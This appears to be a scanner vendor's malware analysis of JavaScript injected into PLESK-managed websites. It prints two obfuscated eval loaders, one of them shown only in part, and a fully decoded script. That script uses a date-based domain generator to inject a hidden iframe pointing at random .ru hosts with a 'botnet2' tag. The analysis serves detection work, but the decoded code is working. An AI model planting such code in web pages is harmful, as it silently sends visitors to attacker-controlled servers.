Quttera web malware scanner API detected PLESK exploit JS

1. /*
2.  * Quttera web malware scanner API detected malicious JavaScript threat injecting malicious iframes
3.  * leading to previously hacked web-sites managed by PLESK panel.
4.  *
5.  *
6.  * First level of obfuscation injects obfuscated JavaScript code that further
7.  * executed and injecting malicious iframes.
8.  *
9.  * The following code utilize pretty simple obfuscation technique based on generation of a string
10.  * from list of characters
11.  */
12.  
13. <script>
14. /*km0ae9gr6m*/
15. window.eval(String.fromCharCode(116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 37, 50, 59, 125, 99, 97, 116, 99, 104, 40, 97, 115, 100, 41, 123, 120, 61, 50, 59, 125, 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 91, 40, 120, 41, 63, 34, 99, 34, 43, 34, 114, 34, 58, 50, 43, 34, 101, 34, 43, 34, 97, 34, 43, 34, 116, 34, 43, 34, 101, 34, 43, 34, 69, 34, 43, 34, 108, 34, 43, 34, 101, 34, 43, 34, 109, 34, 43, 40, 40, 102, 41, 63, 34, 101, 34, 43, 34, 110, 34, ...
16. 91, 102, 114, 43, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 49, 50, 41, 93, 40, 40, 119, 91, 106, 93, 47, 40, 53, 43, 101, 40, 34, 106, 37, 50, 34, 41, 41, 41, 41, 59, 125, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59, 125, 10));
17. </script>
18.  
19. /*
20.  * second level of obfuscation injects more complicated code utilizing execution exceptions handlers
21.  * and smartly initialize local variables basing on correct execution flow.
22.  * Current decoding procedure
23.  * is more complicated "w[j] / (5 + eval('j%2'))" and means that each element of characters array
24.  * should be divided by 5 or 6 depending either it locates on even or odd place of this array.
25.  */
26.  
27. <script>
28. try {
29.     prototype % 2;
30. } catch (asd) {
31.     x = 2;
32. }
33. try {
34.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
35.     q.appendChild(q + "");
36. } catch (fwbewe) {
37.     i = 0;
38.     try {
39.         prototype * 5;
40.     } catch (z) {
41.         fr = "fromChar";
42.         f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, ...
43. 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
44.         v = "eva";
45.     }
46.     if (v) e = window[v + "l"];
47.     w = f;
48.     s = [];
49.     r = String;
50.     z = ((e) ? "Code" : "");
51.     for (; 1776 - 5 + 5 > i; i += 1) {
52.         j = i;
53.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
54.     }
55.     if (f) e(s);
56. }
57. </script>
58.  
59.  
60. /*
61.  * Finally decoded threat generates hidden iframes to random previously hacked *.ru domains
62.  */
63. <script>
64. function nextRandomNumber() {
65.     var hi = this.seed / this.Q;
66.     var lo = this.seed % this.Q;
67.     var test = this.A * lo - this.R * hi;
68.     if (test > 0) {
69.         this.seed = test;
70.     } else {
71.         this.seed = test + this.M;
72.     }
73.     return (this.seed * this.oneOverM);
74. }
75.  
76. function RandomNumberGenerator(unix) {
77.     var d = new Date(unix * 1000);
78.     var s = d.getHours() > 12 ? 1 : 0;
79.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
80.     this.A = 48271;
81.     this.M = 2147483647;
82.     this.Q = this.M / this.A;
83.     this.R = this.M % this.A;
84.     this.oneOverM = 1.0 / this.M;
85.     this.next = nextRandomNumber;
86.     return this;
87. }
88.  
89. function createRandomNumber(r, Min, Max) {
90.     return Math.round((Max - Min) * r.next() + Min);
91. }
92.  
93. function generatePseudoRandomString(unix, length, zone) {
94.     var rand = new RandomNumberGenerator(unix);
95.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
96.     var str = '';
97.     for (var i = 0; i < length; i++) {
98.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
99.     }
100.     return str + '.' + zone;
101. }
102.  
103. setTimeout(function () {
104.     try {
105.         if (typeof iframeWasCreated == "undefined") {
106.             iframeWasCreated = true;
107.             var unix = Math.round(+new Date() / 1000);
108.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
109.             ifrm = document.createElement("IFRAME");
110.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
111.             ifrm.style.width = "0px";
112.             ifrm.style.height = "0px";
113.             ifrm.style.visibility = "hidden";
114.             document.body.appendChild(ifrm);
115.         }
116.     } catch (e) {}
117. }, 500);
118. </script>